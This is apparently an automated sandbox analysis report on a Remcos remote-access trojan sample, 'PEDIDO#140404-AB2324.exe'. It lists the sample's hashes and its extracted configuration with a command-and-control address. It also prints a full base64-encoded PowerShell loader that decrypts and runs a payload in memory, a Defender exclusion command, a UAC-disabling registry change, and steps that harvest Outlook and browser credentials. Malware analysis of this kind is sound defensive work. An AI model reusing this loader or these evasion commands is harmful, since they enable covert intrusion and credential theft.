Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
15-05-2024 23:40
Static task
static1
Behavioral task
behavioral1
Sample
PEDIDO#140404-AB2324.exe
Resource
win7-20240221-en
General
-
Target
PEDIDO#140404-AB2324.exe
-
Size
1.3MB
-
MD5
5632476c595eec38bc4fdf29848521c0
-
SHA1
d56e3c24341e207fe9cec9742a135df0a66796e4
-
SHA256
fb9154259baeba38fcb25fae2d53b8b498a68d451478d067d04e849606f33c6e
-
SHA512
c96e708b3b33d242be36c2e65a52d1f7da04b833aeddcd7e4e93dd136b92cff82bffca032fca40f3544809368ff86517c868db13110138bf17c423ac69045a80
-
SSDEEP
24576:O4WXhHQqP1synFS5noo7971QJL8+Ra6uEwkvLBA03W:Ojd9P1syn/oR71QJZRNuEwkvLd3W
Malware Config
Extracted
remcos
LOGSS
64.188.26.204:2404
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-5AMF0U
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" powershell.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths powershell.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\PEDIDO#140404-AB2324.exe = "0" powershell.exe -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/3988-52-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Nirsoft 2 IoCs
resource yara_rule behavioral2/memory/4336-50-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/3988-52-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft -
pid Process 2024 powershell.exe 3964 powershell.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts aspnet_wp.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 2024 set thread context of 4088 2024 powershell.exe 103 PID 4088 set thread context of 3988 4088 aspnet_wp.exe 107 PID 4088 set thread context of 2140 4088 aspnet_wp.exe 108 PID 4088 set thread context of 4336 4088 aspnet_wp.exe 109 -
Suspicious behavior: EnumeratesProcesses 17 IoCs
pid Process 2024 powershell.exe 2024 powershell.exe 2024 powershell.exe 2024 powershell.exe 2024 powershell.exe 2024 powershell.exe 2024 powershell.exe 2024 powershell.exe 3964 powershell.exe 3964 powershell.exe 3964 powershell.exe 4336 aspnet_wp.exe 4336 aspnet_wp.exe 3988 aspnet_wp.exe 3988 aspnet_wp.exe 3988 aspnet_wp.exe 3988 aspnet_wp.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 4088 aspnet_wp.exe 4088 aspnet_wp.exe 4088 aspnet_wp.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2024 powershell.exe Token: SeDebugPrivilege 3964 powershell.exe Token: SeDebugPrivilege 4336 aspnet_wp.exe -
Suspicious use of WriteProcessMemory 51 IoCs
description pid Process procid_target PID 4548 wrote to memory of 2024 4548 PEDIDO#140404-AB2324.exe 84 PID 4548 wrote to memory of 2024 4548 PEDIDO#140404-AB2324.exe 84 PID 2024 wrote to memory of 3964 2024 powershell.exe 97 PID 2024 wrote to memory of 3964 2024 powershell.exe 97 PID 2024 wrote to memory of 1216 2024 powershell.exe 99 PID 2024 wrote to memory of 1216 2024 powershell.exe 99 PID 2024 wrote to memory of 1216 2024 powershell.exe 99 PID 2024 wrote to memory of 1216 2024 powershell.exe 99 PID 2024 wrote to memory of 1216 2024 powershell.exe 99 PID 2024 wrote to memory of 1216 2024 powershell.exe 99 PID 2024 wrote to memory of 1216 2024 powershell.exe 99 PID 2024 wrote to memory of 1216 2024 powershell.exe 99 PID 2024 wrote to memory of 1216 2024 powershell.exe 99 PID 2024 wrote to memory of 1216 2024 powershell.exe 99 PID 2024 wrote to memory of 2304 2024 powershell.exe 100 PID 2024 wrote to memory of 2304 2024 powershell.exe 100 PID 2024 wrote to memory of 2304 2024 powershell.exe 100 PID 2024 wrote to memory of 2304 2024 powershell.exe 100 PID 2024 wrote to memory of 2304 2024 powershell.exe 100 PID 2024 wrote to memory of 2304 2024 powershell.exe 100 PID 2024 wrote to memory of 2304 2024 powershell.exe 100 PID 2024 wrote to memory of 2304 2024 powershell.exe 100 PID 2024 wrote to memory of 2304 2024 powershell.exe 100 PID 2024 wrote to memory of 2304 2024 powershell.exe 100 PID 2024 wrote to memory of 3804 2024 powershell.exe 101 PID 2024 wrote to memory of 3804 2024 powershell.exe 101 PID 2024 wrote to memory of 3804 2024 powershell.exe 101 PID 2024 wrote to memory of 4088 2024 powershell.exe 103 PID 2024 wrote to memory of 4088 2024 powershell.exe 103 PID 2024 wrote to memory of 4088 2024 powershell.exe 103 PID 2024 wrote to memory of 4088 2024 powershell.exe 103 PID 2024 wrote to memory of 4088 2024 powershell.exe 103 PID 2024 wrote to memory of 4088 2024 powershell.exe 103 PID 2024 wrote to memory of 4088 2024 powershell.exe 103 PID 2024 wrote to memory of 4088 2024 powershell.exe 103 PID 2024 wrote to memory of 4088 2024 powershell.exe 103 PID 2024 wrote to memory of 4088 2024 powershell.exe 103 PID 2024 wrote to memory of 4088 2024 powershell.exe 103 PID 2024 wrote to memory of 4088 2024 powershell.exe 103 PID 4088 wrote to memory of 3988 4088 aspnet_wp.exe 107 PID 4088 wrote to memory of 3988 4088 aspnet_wp.exe 107 PID 4088 wrote to memory of 3988 4088 aspnet_wp.exe 107 PID 4088 wrote to memory of 3988 4088 aspnet_wp.exe 107 PID 4088 wrote to memory of 2140 4088 aspnet_wp.exe 108 PID 4088 wrote to memory of 2140 4088 aspnet_wp.exe 108 PID 4088 wrote to memory of 2140 4088 aspnet_wp.exe 108 PID 4088 wrote to memory of 2140 4088 aspnet_wp.exe 108 PID 4088 wrote to memory of 4336 4088 aspnet_wp.exe 109 PID 4088 wrote to memory of 4336 4088 aspnet_wp.exe 109 PID 4088 wrote to memory of 4336 4088 aspnet_wp.exe 109 PID 4088 wrote to memory of 4336 4088 aspnet_wp.exe 109
Processes
-
C:\Users\Admin\AppData\Local\Temp\PEDIDO#140404-AB2324.exe"C:\Users\Admin\AppData\Local\Temp\PEDIDO#140404-AB2324.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4548 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgANQAwADAAMAApAAoACgAkABIEQAQ1BDwENQQ9BD0EMARPBB8EMAQ/BDoEMAQgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJAAoBDAEMQQ7BD4EPQQgAD0AIAAnAGYAaQBsAGUALQAqAC4AcAB1AHQAaQBrACcACgAkAB8EPgRBBDsENQQ0BD0EOAQ5BCQEMAQ5BDsEIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAEgRABDUEPAQ1BD0EPQQwBE8EHwQwBD8EOgQwBCAALQBGAGkAbAB0AGUAcgAgACQAKAQwBDEEOwQ+BD0EIAB8ACAAUwBvAHIAdAAtAE8AYgBqAGUAYwB0ACAATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBGAGkAcgBzAHQAIAAxAAoACgBmAHUAbgBjAHQAaQBvAG4AIAAgBDAEQQRIBDgERARABD4EMgQwBEIETAQgAHsACgAgACAAIAAgAHAAYQByAGEAbQAgACgACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAGgQ7BE4ERwQsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABgEPQQ4BEYEOAQwBDsEOAQ3BDgEQARDBE4ESQQ4BDkEEgQ1BDoEQgQ+BEAELAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJAAUBDAEPQQ9BEsENQQKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkACgEOAREBEAEMARCBD4EQAQgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBBAGUAcwBdADoAOgBDAHIAZQBhAHQAZQAoACkACgAgACAAIAAgACQAKAQ4BEQEQAQwBEIEPgRABC4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkACgEOAREBEAEMARCBD4EQAQuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkACAEMARBBEgEOAREBEAEPgQyBEkEOAQ6BCAAPQAgACQAKAQ4BEQEQAQwBEIEPgRABC4AQwByAGUAYQB0AGUARABlAGMAcgB5AHAAdABvAHIAKAAkABoEOwROBEcELAAgACQAGAQ9BDgERgQ4BDAEOwQ4BDcEOARABEMETgRJBDgEOQQSBDUEOgRCBD4EQAQpAAoAIAAgACAAIAAkACAEMARBBEgEOAREBEAEPgQyBDAEPQQ9BEsENQQUBDAEPQQ9BEsENQQgAD0AIAAkACAEMARBBEgEOAREBEAEPgQyBEkEOAQ6BC4AVAByAGEAbgBzAGYAbwByAG0ARgBpAG4AYQBsAEIAbABvAGMAawAoACQAFAQwBD0EPQRLBDUELAAgADAALAAgACQAFAQwBD0EPQRLBDUELgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkACAEMARBBEgEOAREBEAEPgQyBDAEPQQ9BEsENQQUBDAEPQQ9BEsENQQKAH0ACgAKACQAGgQ7BE4ERwQgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeABCAEUALAAgADAAeABEAEYALAAgADAAeABCADgALAAgADAAeABBAEUALAAgADAAeABCADYALAAgADAAeAAxAEQALAAgADAAeABGADAALAAgADAAeABBAEUALAAgADAAeAAzAEEALAAgADAAeAA2AEEALAAgADAAeAA4AEMALAAgADAAeAAzAEYALAAgADAAeAAwADkALAAgADAAeABBAEEALAAgADAAeAA3ADMALAAgADAAeAAxADgALAAgADAAeAA3ADIALAAgADAAeAA0ADAALAAgADAAeAAzAEYALAAgADAAeAAzAEEALAAgADAAeAAxAEYALAAgADAAeAA0ADkALAAgADAAeAAxAEEALAAgADAAeAA5ADMALAAgADAAeAAwAEMALAAgADAAeABFAEYALAAgADAAeAAyADIALAAgADAAeAA5ADMALAAgADAAeABGADAALAAgADAAeAAwADAALAAgADAAeAAyADcALAAgADAAeAAyADAAKQAKACQAGAQ9BDgERgQ4BDAEOwQ4BDcEOARABEMETgRJBDgEOQQSBDUEOgRCBD4EQAQgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeABDAEMALAAgADAAeABCAEYALAAgADAAeAAxADYALAAgADAAeAA5AEYALAAgADAAeAAxADcALAAgADAAeABBADMALAAgADAAeAA3AEQALAAgADAAeAA1ADgALAAgADAAeAA3ADAALAAgADAAeAA4AEIALAAgADAAeAAzADIALAAgADAAeAA0AEMALAAgADAAeAA3ADgALAAgADAAeAA0ADAALAAgADAAeAA4AEUALAAgADAAeABFAEMAKQAKAAoAaQBmACAAKAAkAB8EPgRBBDsENQQ0BD0EOAQ5BCQEMAQ5BDsEIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAKACAAIAAgACAAJAAfBEMEQgRMBCQEMAQ5BDsEMAQgAD0AIAAkAB8EPgRBBDsENQQ0BD0EOAQ5BCQEMAQ5BDsELgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAFwQwBEgEOAREBEAEPgQyBDAEPQQ9BEsENQQRBDAEOQRCBEsEIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAB8EQwRCBEwEJAQwBDkEOwQwBCkAOwAKACAAIAAgACAAJAAgBDAEQQRIBDgERARABD4EMgQwBD0EPQQ+BDUEIQQ+BDQENQRABDYEOAQ8BD4ENQQgAD0AIAAgBDAEQQRIBDgERARABD4EMgQwBEIETAQgAC0AGgQ7BE4ERwQgACQAGgQ7BE4ERwQgAC0AGAQ9BDgERgQ4BDAEOwQ4BDcEOARABEMETgRJBDgEOQQSBDUEOgRCBD4EQAQgACQAGAQ9BDgERgQ4BDAEOwQ4BDcEOARABEMETgRJBDgEOQQSBDUEOgRCBD4EQAQgAC0AFAQwBD0EPQRLBDUEIAAkABcEMARIBDgERARABD4EMgQwBD0EPQRLBDUEEQQwBDkEQgRLBAoACgAgACAAIAAgACQAIQQxBD4EQAQ6BDAEIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAFsAYgB5AHQAZQBbAF0AXQBAACgAJAAgBDAEQQRIBDgERARABD4EMgQwBD0EPQQ+BDUEIQQ+BDQENQRABDYEOAQ8BD4ENQQpACkAOwAKACAAIAAgACAAJAAiBD4ERwQ6BDAEEgRFBD4ENAQwBCAAPQAgACQAIQQxBD4EQAQ6BDAELgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQAIgQ+BEcEOgQwBBIERQQ+BDQEMAQuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIAAkAG4AdQBsAGwAKQA7AAoAfQAKAA==2⤵
- UAC bypass
- Windows security bypass
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\PEDIDO#140404-AB2324.exe" -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3964
-
-
C:\Windows\System32\svchost.exe"C:\Windows\System32\svchost.exe"3⤵PID:1216
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"3⤵PID:2304
-
-
C:\Program Files (x86)\Windows Mail\wab.exe"C:\Program Files (x86)\Windows Mail\wab.exe"3⤵PID:3804
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe"3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4088 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe /stext "C:\Users\Admin\AppData\Local\Temp\czdvszxioagoolnhkapipoa"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3988
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe /stext "C:\Users\Admin\AppData\Local\Temp\nbiftjikciytyrbltlcbztvzrr"4⤵
- Accesses Microsoft Outlook accounts
PID:2140
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe /stext "C:\Users\Admin\AppData\Local\Temp\pvoytctdqqqybfxplwwdcgqqsxfbl"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4336
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD5135c60fadfa99b241d9109417db8b53c
SHA1b73785818a32e8d84bb55c02ccdc3d546a615526
SHA25601fc52f877352f6252d3d9351993fc35d7b6b0051ac6d3146184e12f9bc6e704
SHA51276812b91e51f1a206e3829b44cf13ee4cc4e5e90d88c0b0b3755b1e092eee26e6a4b18ef038a311a9443dab138761ff45fdd18145931207764c2355047611f51
-
Filesize
20KB
MD54bbb5cd3041c27a9dd85df1e35dec081
SHA146119374a13d578ea9049d8ea91a3abadbdeee8e
SHA2561d8a4c2788ef4ea0d89774c48acef7ad33b4fb92c21039424a4ff10df8094826
SHA512c4f5d110a5a91803cdb86a080ae5ab3bf7f67debdd9b71af68908099e907a9896e7c7e60e7467ef2e9800952df5b5a295e69c3877ee0a7c1e1f8532a0f6d7c76